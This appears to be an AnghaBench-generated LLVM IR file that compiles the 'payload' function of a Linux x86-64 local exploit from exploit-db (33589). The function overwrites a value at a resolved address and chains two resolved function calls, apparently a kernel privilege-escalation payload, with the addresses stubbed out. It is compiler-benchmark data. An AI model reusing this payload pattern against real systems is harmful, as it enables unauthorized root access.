; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux_x86-64/local/extr_33589.c_payload.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux_x86-64/local/extr_33589.c_payload.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @payload() #0 {
  %1 = alloca i32*, align 8
  %2 = alloca i32 (i32)*, align 8
  %3 = alloca i32 (i32)*, align 8
  %4 = call i64 @AB(i32 1)
  %5 = inttoptr i64 %4 to i8*
  %6 = bitcast i8* %5 to i32*
  store i32* %6, i32** %1, align 8
  %7 = load i32*, i32** %1, align 8
  store i32 -1, i32* %7, align 4
  %8 = call i64 @AB(i32 2)
  %9 = inttoptr i64 %8 to i32 (i32)*
  store i32 (i32)* %9, i32 (i32)** %2, align 8
  %10 = call i64 @AB(i32 3)
  %11 = inttoptr i64 %10 to i32 (i32)*
  store i32 (i32)* %11, i32 (i32)** %3, align 8
  %12 = load i32 (i32)*, i32 (i32)** %2, align 8
  %13 = load i32 (i32)*, i32 (i32)** %3, align 8
  %14 = call i32 %13(i32 0)
  %15 = call i32 %12(i32 %14)
  ret void
}

declare dso_local i64 @AB(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
